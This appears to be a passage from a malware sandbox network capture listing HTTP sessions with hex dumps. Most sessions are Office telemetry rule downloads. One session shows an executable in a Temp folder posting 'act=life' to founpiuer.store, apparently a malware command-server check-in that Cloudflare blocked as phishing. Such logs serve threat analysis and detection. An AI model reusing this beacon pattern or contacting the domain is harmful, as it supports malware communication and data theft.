2024-11-05 17:46:21 UTC	192	OUT	GET /rules/rule702150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:22 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:22 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT ETag: "0x8DC582BEDC8193E" x-ms-request-id: 95e3a472-701e-0050-58d2-2c6767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174622Z-16547b76f7f8dwtrhC1DFWd1zn00000005g000000000str3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:22 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49873	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:22 UTC	192	OUT	GET /rules/rule702151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:22 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:22 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE156D2EE" x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174622Z-16547b76f7f7rtshhC1DFWrtqn00000005g000000000f4kp x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:22 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:22 UTC	192	OUT	GET /rules/rule703001v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:22 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:22 GMT Content-Type: text/xml Content-Length: 1406 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB16F27E" x-ms-request-id: 3018e59d-101e-008d-7cd2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174622Z-16547b76f7fvllnfhC1DFWxkg800000005dg00000000tx01 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:22 UTC	1406	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49875	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:23 UTC	192	OUT	GET /rules/rule700751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:23 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:23 GMT Content-Type: text/xml Content-Length: 1414 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE03B051D" x-ms-request-id: 55d4e3a1-401e-00a3-7d5f-2e8b09000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174623Z-17df447cdb57g7m7hC1DFW791s00000001hg00000000nfxs x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:23 UTC	1414	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49878	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:23 UTC	192	OUT	GET /rules/rule700750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:23 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:23 GMT Content-Type: text/xml Content-Length: 1377 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT ETag: "0x8DC582BEAFF0125" x-ms-request-id: c37b6205-c01e-0034-655c-2e2af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174623Z-17df447cdb5jg4kthC1DFWux4n00000001r0000000009aq6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:23 UTC	1377	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49879	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:23 UTC	192	OUT	GET /rules/rule700151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:23 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:23 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0A2434F" x-ms-request-id: f75e4e35-501e-0047-5855-2ece6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174623Z-17df447cdb5km9skhC1DFWy2rc00000001r000000000h6t3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:23 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	49880	104.21.5.155	443	7788	C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:23 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: founpiuer.store
2024-11-05 17:46:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-05 17:46:23 UTC	552	IN	HTTP/1.1 403 Forbidden Date: Tue, 05 Nov 2024 17:46:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WxKfud6HUUUauFKWjUc5K%2BUmHEOdDEgX1qi642jLQjzOaAVxFMWYccHG9qSwvk07P6Q1AUjKnmyfzwve60KjbgBDHkDEDL%2F3UuWlyp1Tl31FTfXdsGCALUdlkwmPfpe1sA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddea9b95d845211-DEN
2024-11-05 17:46:23 UTC	817	IN	Data Raw: 31 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1154<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-11-05 17:46:23 UTC	1369	IN	Data Raw: 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f Data Ascii: /cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('coo
2024-11-05 17:46:23 UTC	1369	IN	Data Raw: 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 Data Ascii: ment/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inpu
2024-11-05 17:46:23 UTC	889	IN	Data Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 Data Ascii: <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
2024-11-05 17:46:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49881	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:23 UTC	192	OUT	GET /rules/rule700150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:24 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:23 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE54CA33F" x-ms-request-id: 1d414214-201e-0003-4d32-2cf85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174623Z-16547b76f7f4k79zhC1DFWu9y000000005hg00000000ap5n x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:24 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:23 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49882	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:23 UTC	192	OUT	GET /rules/rule703451v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:24 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:23 GMT Content-Type: text/xml Content-Length: 1409 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFC438CF" x-ms-request-id: 1659f8fb-101e-0017-616d-2e47c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174623Z-15869dbbcc6b2ncxhC1DFW661800000000q0000000000n0f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:24 UTC	1409	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49884	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:24 UTC	192	OUT	GET /rules/rule703450v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:24 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:24 GMT Content-Type: text/xml Content-Length: 1372 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6669CA7" x-ms-request-id: 149ea2ad-201e-003f-48d2-2c6d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174624Z-16547b76f7f7rtshhC1DFWrtqn00000005mg00000000070v x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
